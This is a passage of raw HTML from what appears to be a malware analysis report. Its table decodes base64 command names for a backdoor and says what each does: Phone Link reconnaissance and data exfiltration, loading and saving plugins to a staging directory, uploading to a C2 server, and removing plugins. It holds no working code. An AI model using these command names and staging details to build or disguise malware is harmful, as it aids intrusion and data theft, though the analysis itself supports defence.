color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">R2V0V2lkZ2V0TG9n</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1343441575" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{242}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">GetWidgetLog</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="202114822" paraeid="{00207e50-7602-4537-ab0a-2d781bd4aa9a}{249}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Phone Link recon logs and data<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">exfiltration</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="9" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="967884309" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{4}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">cGx1Z2lu</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="161224148" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{11}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">plugin</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1026302340" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{18}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Load<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">p</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">lugin</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="10" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1404279304" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{30}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">c2F2ZVBsdWdpbg==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1647099914" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{37}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">savePlugin</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1682608974" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{44}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Save<span class="Apple-converted-space">&#xA0;</span></span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">p</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">lugin to disk at the staging directory C:\ProgramData\Microsoft\whealth\</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="11" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="713713113" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{56}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">c2VuZFBsdWdpbg==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="88073306" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{63}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">sendPlugin</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="405610381" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{70}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">Upload Plugin</span><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;"><span class="Apple-converted-space">&#xA0;</span>to C2</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td></tr><tr class="TableRow SCXW93055062 BCX4" role="row" aria-rowindex="12" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; height: 19px;"><td class="FirstCol SCXW93055062 BCX4" role="rowheader" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 177px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="1854095058" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{80}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">UmVtb3ZlUGx1Z2lucw==</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td data-celllook="0" class="SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 164px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="667575131" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{87}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="none" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; color: rgb(0, 0, 0); font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; -webkit-nbsp-mode: normal !important;">RemovePlugins</span></span><span class="EOP SCXW93055062 BCX4" data-ccp-props="{}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 10.5pt; line-height: 17px; font-family: Roboto, Roboto_EmbeddedFont, Roboto_MSCustomFont, Roboto_MSFontService, sans-serif; color: rgb(0, 0, 0); -webkit-nbsp-mode: normal !important;">&#xA0;</span></p></div></div></td><td class="LastCol SCXW93055062 BCX4" data-celllook="0" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow: visible; vertical-align: top; position: relative; background-color: transparent; background-clip: padding-box; border: 1px solid rgb(0, 0, 0); width: 282px;"><div class="TableCellContent SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px 7px; -webkit-user-select: text; overflow: visible;"><div class="OutlineElement Ltr SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; clear: both; cursor: text; overflow: visible; position: relative; direction: ltr;"><p class="Paragraph SCXW93055062 BCX4" paraid="129629195" paraeid="{beacb119-9364-4b02-a3d7-9651670b216a}{94}" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; overflow-wrap: break-word; font-weight: normal; font-style: normal; vertical-align: baseline; background-color: transparent; color: windowtext; text-align: left; text-indent: 0px; -webkit-nbsp-mode: normal !important;"><span data-contrast="auto" xml:lang="EN-US" lang="EN-US" class="TextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; font-size: 12pt; line-height: 18px; font-family: Aptos, Aptos_EmbeddedFont, Aptos_MSCustomFont, Aptos_MSFontService, sans-serif; font-variant-ligatures: none !important; -webkit-nbsp-mode: normal !important;"><span class="NormalTextRun SCXW93055062 BCX4" style="-webkit-user-drag: none; margin: 0px; padding: 0px; -webkit-user-select: text; 